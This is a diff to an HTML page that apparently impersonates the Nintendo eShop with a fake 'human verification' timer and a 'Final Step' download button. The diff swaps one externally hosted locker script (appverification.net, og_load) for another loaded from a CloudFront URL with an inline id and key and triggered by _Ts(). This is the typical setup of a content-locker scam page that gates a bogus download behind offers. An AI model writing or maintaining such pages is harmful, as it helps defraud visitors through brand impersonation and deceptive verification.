--- a/index.html
+++ b/index.html
@@ -2,7 +2,10 @@
 <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
 	
 <head>
-  <script type="text/javascript" id="ogjs" src="https://appverification.net/cl/js/dv8qj7"></script>
+  <script type="text/javascript">
+    var WSCKg_ycI_XfvgEc={"it":4466039,"key":"00573"};
+</script>
+<script src="https://d2v7l2267atlz5.cloudfront.net/ebcc656.js"></script>
 
 		<title>Nintendo eShop
 		</title>
@@ -42,7 +45,7 @@
 						<span id="human_verification_timer_time"><span>5 minutes and 00 seconds</span></span>
 					</div>
 					<div class="button-wrapper">
-						<a onclick="og_load()"><div id="b-1" class="button animated pulse infinite"><span class="lnr -download"></span><span>Final Step&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></div></a>
+						<a onclick="_Ts()"><div id="b-1" class="button animated pulse infinite"><span class="lnr -download"></span><span>Final Step&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></div></a>
 					</div>
 				</div>
 			</div>
